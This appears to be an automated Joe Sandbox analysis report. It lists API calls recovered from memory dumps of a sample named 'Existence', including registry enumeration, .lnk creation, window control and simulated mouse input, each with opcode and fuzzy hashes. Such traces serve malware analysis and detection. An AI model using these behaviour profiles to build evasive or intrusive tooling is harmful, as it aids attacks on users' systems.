• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007604B0
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
• String ID:
• API String ID: 1992179935-0
• Opcode ID: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
• Instruction ID: c419cde5080cb153381dea3ac8464596edc8a838cf0cc8f7c3586f9c13a036b7
• Opcode Fuzzy Hash: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
• Instruction Fuzzy Hash: 82811671A00706DBE721AE69CC85B6B77A9EF45320F24412EF917D7282EB78D90187D0
Uniqueness
Uniqueness Score: -1.00%

APIs
• MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00758649,00758649,?,?,?,007667C2,00000001,00000001,8BE85006), ref: 007665CB
• MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,007667C2,00000001,00000001,8BE85006,?,?,?), ref: 00766651
• WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0076674B
• __freea.LIBCMT ref: 00766758
  • Part of subcall function 00763B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00756A79,?,0000015D,?,?,?,?,007585B0,000000FF,00000000,?,?), ref: 00763BC5
• __freea.LIBCMT ref: 00766761
• __freea.LIBCMT ref: 00766786
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: ByteCharMultiWide__freea$AllocateHeap
• String ID:
• API String ID: 1414292761-0
• Opcode ID: 089ca39a42c52bf57cf870aa17dc0487b0687062eb1a9f9425b52ef577e4fadd
• Instruction ID: 327638a668bc29a1cf44df9a36f5132f09752b892c14f7bfc9f3bb3a6e2ef8af
• Opcode Fuzzy Hash: 089ca39a42c52bf57cf870aa17dc0487b0687062eb1a9f9425b52ef577e4fadd
• Instruction Fuzzy Hash: 145106B260020AAFDB258F64CC85EBF77AAEB40754F554669FC1AD7144EB3CEC50C6A0
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0073B329: _wcslen.LIBCMT ref: 0073B333
  • Part of subcall function 007BD3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,007BC10E,?,?), ref: 007BD415
  • Part of subcall function 007BD3F8: _wcslen.LIBCMT ref: 007BD451
  • Part of subcall function 007BD3F8: _wcslen.LIBCMT ref: 007BD4C8
  • Part of subcall function 007BD3F8: _wcslen.LIBCMT ref: 007BD4FE
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007BC72A
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 007BC785
• RegCloseKey.ADVAPI32(00000000), ref: 007BC7CA
• RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 007BC7F9
• RegCloseKey.ADVAPI32(?,?,00000000), ref: 007BC853
• RegCloseKey.ADVAPI32(?), ref: 007BC85F
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
• String ID:
• API String ID: 1120388591-0
• Opcode ID: 36e2597060dc8837a3fd21c654a8140ff75f760052bc43ac65c9733c82e523de
• Instruction ID: aacfc5c1ad0348e792cfb0b756c479e28cecb4c8c2c36ca6e424ef94e273ce82
• Opcode Fuzzy Hash: 36e2597060dc8837a3fd21c654a8140ff75f760052bc43ac65c9733c82e523de
• Instruction Fuzzy Hash: 56818A70208241EFD715DF24C885F6ABBE5BF84308F0484ACF4598B2A2DB39ED45CB92
Uniqueness
Uniqueness Score: -1.00%

APIs
• VariantInit.OLEAUT32(00000035), ref: 007900A9
• SysAllocString.OLEAUT32(00000000), ref: 00790150
• VariantCopy.OLEAUT32(00790354,00000000), ref: 00790179
• VariantClear.OLEAUT32(00790354), ref: 0079019D
• VariantCopy.OLEAUT32(00790354,00000000), ref: 007901A1
• VariantClear.OLEAUT32(?), ref: 007901AB
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: Variant$ClearCopy$AllocInitString
• String ID:
• API String ID: 3859894641-0
• Opcode ID: fa91bd7774c9eaaba0bd54ca1c792bfe0f888696f8bcebb55c580a2bd0239ac6
• Instruction ID: 0887ab60b833177fdcb5a5aacec887e337d671586c881a5e70d9d2bf2105267f
• Opcode Fuzzy Hash: fa91bd7774c9eaaba0bd54ca1c792bfe0f888696f8bcebb55c580a2bd0239ac6
• Instruction Fuzzy Hash: F651D831660310EEDF24AB64A88DB29B3A5FF45310F249447F906DF296DB789C44CBD6
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 007341EA: _wcslen.LIBCMT ref: 007341EF
  • Part of subcall function 00738577: _wcslen.LIBCMT ref: 0073858A
• GetOpenFileNameW.COMDLG32(00000058), ref: 007A9F2A
• _wcslen.LIBCMT ref: 007A9F4B
• _wcslen.LIBCMT ref: 007A9F72
• GetSaveFileNameW.COMDLG32(00000058), ref: 007A9FCA
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: _wcslen$FileName$OpenSave
• String ID: X
• API String ID: 83654149-3081909835
• Opcode ID: 660ab5b81415306b14f9880ae0f86de500d312c10fa7e9470314998f2b475f7b
• Instruction ID: 8bfa5b2cc1a5ce64070799eb50129fd336d77611035cefd96557304a01d596e4
• Opcode Fuzzy Hash: 660ab5b81415306b14f9880ae0f86de500d312c10fa7e9470314998f2b475f7b
• Instruction Fuzzy Hash: 52E1B371604340DFD724EF24C885B6AB7E0BF85314F04896CF9899B2A2DB79ED45CB92
Uniqueness
Uniqueness Score: -1.00%

APIs
• _wcslen.LIBCMT ref: 007A6F21
• CoInitialize.OLE32(00000000), ref: 007A707E
• CoCreateInstance.OLE32(007D0CC4,00000000,00000001,007D0B34,?), ref: 007A7095
• CoUninitialize.OLE32 ref: 007A7319
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: CreateInitializeInstanceUninitialize_wcslen
• String ID: .lnk
• API String ID: 886957087-24824748
• Opcode ID: 1e217c89b19e8f2e6bb7076d01a0acadb0f6875ae3e58d0d11334981c7fab44c
• Instruction ID: 6ac6c27dfccd2ced96d1b214be849f17cb1d1f7921ab93aac62f8abfd7bff36c
• Opcode Fuzzy Hash: 1e217c89b19e8f2e6bb7076d01a0acadb0f6875ae3e58d0d11334981c7fab44c
• Instruction Fuzzy Hash: 2AD13771608301EFD304EF24C885A6BB7E8FF99704F40896DF5858B2A2DB75E945CB92
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0073249F: GetWindowLongW.USER32(00000000,000000EB), ref: 007324B0
• BeginPaint.USER32(?,?,?), ref: 00731B35
• GetWindowRect.USER32(?,?), ref: 00731B99
• ScreenToClient.USER32(?,?), ref: 00731BB6
• SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00731BC7
• EndPaint.USER32(?,?,?,?,?), ref: 00731C15
• Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00773287
  • Part of subcall function 00731C2D: BeginPath.GDI32(00000000), ref: 00731C4B
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
• String ID:
                                                                                                                                                                                          • API String ID: 3050599898-0
                                                                                                                                                                                          • Opcode ID: 66efc8f5320e49525d3520f608fd2f68e18949081396285658e7134c06530f1b
                                                                                                                                                                                          • Instruction ID: 6642f5b5b07b2ea9d50488f472712e1b5ad8c1df0663484d04144b48014c76dc
                                                                                                                                                                                          • Opcode Fuzzy Hash: 66efc8f5320e49525d3520f608fd2f68e18949081396285658e7134c06530f1b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2F41D270105300AFEB20DF24DC88FB67BA8FB45364F144669FA98862A2C7799D45DB62
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • InterlockedExchange.KERNEL32(?,000001F5), ref: 007A11B3
                                                                                                                                                                                          • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 007A11EE
                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 007A120A
                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 007A1283
                                                                                                                                                                                          • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 007A129A
                                                                                                                                                                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 007A12C8
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3368777196-0
                                                                                                                                                                                          • Opcode ID: 50c396ad3f0188ff502f0759c224b70e138202d4c14b138bc493ad06cb6659c1
                                                                                                                                                                                          • Instruction ID: 92554566f9b14b077abfe2bcc93de32d5d5e67d7731740d4fa2c8a6a55054e9f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 50c396ad3f0188ff502f0759c224b70e138202d4c14b138bc493ad06cb6659c1
                                                                                                                                                                                          • Instruction Fuzzy Hash: C641A031A00208EFEF049F54DC89AAAB7B8FF44310F1480A9FD009B296D778DE55CBA4
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0078FBEF,00000000,?,?,00000000,?,007739E2,00000004,00000000,00000000), ref: 007C8CA7
                                                                                                                                                                                          • EnableWindow.USER32(?,00000000), ref: 007C8CCD
                                                                                                                                                                                          • ShowWindow.USER32(FFFFFFFF,00000000), ref: 007C8D2C
                                                                                                                                                                                          • ShowWindow.USER32(?,00000004), ref: 007C8D40
                                                                                                                                                                                          • EnableWindow.USER32(?,00000001), ref: 007C8D66
                                                                                                                                                                                          • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 007C8D8A
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$Show$Enable$MessageSend
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 642888154-0
                                                                                                                                                                                          • Opcode ID: 5a3b6fc1bc080ce5ca7ad26f7abbf3c1f11d60ebd0a55a03a6499a044d16da57
                                                                                                                                                                                          • Instruction ID: 611c421a6b80a0c0295c4bd9b5010150d42f4edbef5af94bfd292b93da56d937
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5a3b6fc1bc080ce5ca7ad26f7abbf3c1f11d60ebd0a55a03a6499a044d16da57
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0E41C130602644AFDBB5CF24D889FA17BF0FB49304F1840ADE5094B2B2CB79AC45CB62
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetForegroundWindow.USER32(?,?,00000000), ref: 007B2D45
                                                                                                                                                                                            • Part of subcall function 007AEF33: GetWindowRect.USER32(?,?), ref: 007AEF4B
                                                                                                                                                                                          • GetDesktopWindow.USER32 ref: 007B2D6F
                                                                                                                                                                                          • GetWindowRect.USER32(00000000), ref: 007B2D76
                                                                                                                                                                                          • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 007B2DB2
                                                                                                                                                                                          • GetCursorPos.USER32(?), ref: 007B2DDE
                                                                                                                                                                                          • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 007B2E3C
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2387181109-0
                                                                                                                                                                                          • Opcode ID: 9b34ac6ba4d9c5bdb0051c8b1a09baf8c3660295a6ac2baef948997cd628a3be
                                                                                                                                                                                          • Instruction ID: b07b68a252d573e31d36c4bbbd86a1f80f00c2d52c6d55ba1d5d2f5edf05fbb5
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9b34ac6ba4d9c5bdb0051c8b1a09baf8c3660295a6ac2baef948997cd628a3be
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7031D272605315ABC720DF14D849F9BB7A9FB88354F00052DF495A7191DA38E905CBD1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • IsWindowVisible.USER32(?), ref: 007955F9
                                                                                                                                                                                          • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00795616
                                                                                                                                                                                          • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0079564E
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 0079566C
                                                                                                                                                                                          • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00795674
                                                                                                                                                                                          • _wcsstr.LIBVCRUNTIME ref: 0079567E
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 72514467-0
                                                                                                                                                                                          • Opcode ID: 60d3a4874f0b7536c93dbb3bda3d247453021ec2b1e60fbe186a6c3557c27fb8
                                                                                                                                                                                          • Instruction ID: da51df0171c0f664da83023af491c31e95b722392bb1210a220f9e28c7c2c123
                                                                                                                                                                                          • Opcode Fuzzy Hash: 60d3a4874f0b7536c93dbb3bda3d247453021ec2b1e60fbe186a6c3557c27fb8
                                                                                                                                                                                          • Instruction Fuzzy Hash: 78212632204A14BBEF265B35AC49E7F7BA8DF45B50F14803DFC05CA091EAB8DC4187A1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
  • Part of subcall function 00735851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007355D1,?,?,00774B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00735871
• _wcslen.LIBCMT ref: 007A62C0
• CoInitialize.OLE32(00000000), ref: 007A63DA
• CoCreateInstance.OLE32(007D0CC4,00000000,00000001,007D0B34,?), ref: 007A63F3
• CoUninitialize.OLE32 ref: 007A6411
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
• String ID: .lnk
• API String ID: 3172280962-24824748
• Opcode ID: d198c37f808281bd513454e27c04a994e81e8b9a005eb1699c750bba685f5c0e
• Instruction ID: f931579f91fd65c528de68748ffa816fcbab4aac6d13b59ef0ffd0adaea1a8b3
• Opcode Fuzzy Hash: d198c37f808281bd513454e27c04a994e81e8b9a005eb1699c750bba685f5c0e
• Instruction Fuzzy Hash: 39D12275A042019FCB14DF24C484A2ABBE5EF8A714F188959F8859B362CB39ED45CB92
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetWindowLongW.USER32(?,000000F0), ref: 007C8740
• SetWindowLongW.USER32(00000000,000000F0,?), ref: 007C8765
• SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 007C877D
• GetSystemMetrics.USER32(00000004), ref: 007C87A6
• SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,007AC1F2,00000000), ref: 007C87C6
  • Part of subcall function 0073249F: GetWindowLongW.USER32(00000000,000000EB), ref: 007324B0
• GetSystemMetrics.USER32(00000004), ref: 007C87B1
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: Window$Long$MetricsSystem
• String ID:
• API String ID: 2294984445-0
• Opcode ID: 0680c16eae702568696e6259042be0905d4f129fb234d5c248db61ea17bbfed8
• Instruction ID: f1c22f409abb6c6b865db7b8c4eb1cd760cb8767e6f8312608fae0ebe0b647dd
• Opcode Fuzzy Hash: 0680c16eae702568696e6259042be0905d4f129fb234d5c248db61ea17bbfed8
• Instruction Fuzzy Hash: 10215E71610241AFCB649FB8CC48F6A3BA5FB45365F35863DF926D21E0EA788850CB11
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetLastError.KERNEL32(?,?,007536E9,00753355), ref: 00753700
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0075370E
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00753727
• SetLastError.KERNEL32(00000000,?,007536E9,00753355), ref: 00753779
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: ErrorLastValue___vcrt_
• String ID:
• API String ID: 3852720340-0
• Opcode ID: 0a0adaef601c0556cfa0e6b32eead7b6bcd380db8e0a6c4e25aa690ac2e6ec17
• Instruction ID: 0bb271ea29849b46a24b7311556c31db371f6b88a33f474714db78a9b6abfbd0
• Opcode Fuzzy Hash: 0a0adaef601c0556cfa0e6b32eead7b6bcd380db8e0a6c4e25aa690ac2e6ec17
• Instruction Fuzzy Hash: 3E01F9B2909711AEA63517746CC99EA2795D7097F7720462DF810410F0EFDD4D0AA148
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetLastError.KERNEL32(?,00000000,00754D53,00000000,?,?,007568E2,?,?,00000000), ref: 007630EB
• _free.LIBCMT ref: 0076311E
• _free.LIBCMT ref: 00763146
• SetLastError.KERNEL32(00000000,?,00000000), ref: 00763153
• SetLastError.KERNEL32(00000000,?,00000000), ref: 0076315F
• _abort.LIBCMT ref: 00763165
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: ErrorLast$_free$_abort
• String ID:
• API String ID: 3160817290-0
• Opcode ID: 6ac709ab9fc6eefe4ba2b9477f2b552e45f75baf5b3522f8e56b38e1f08a9889
• Instruction ID: 0fdfb8df084849c31e8a85d65b8f0780ced329aa233d9323b90ecc9276063ea9
• Opcode Fuzzy Hash: 6ac709ab9fc6eefe4ba2b9477f2b552e45f75baf5b3522f8e56b38e1f08a9889
• Instruction Fuzzy Hash: E0F02D75604D08E6C2262738EC0EE5E135A9FC3770B264029FD27D22D2EF2C8E03C165
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00731F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00731F87
  • Part of subcall function 00731F2D: SelectObject.GDI32(?,00000000), ref: 00731F96
  • Part of subcall function 00731F2D: BeginPath.GDI32(?), ref: 00731FAD
  • Part of subcall function 00731F2D: SelectObject.GDI32(?,00000000), ref: 00731FD6
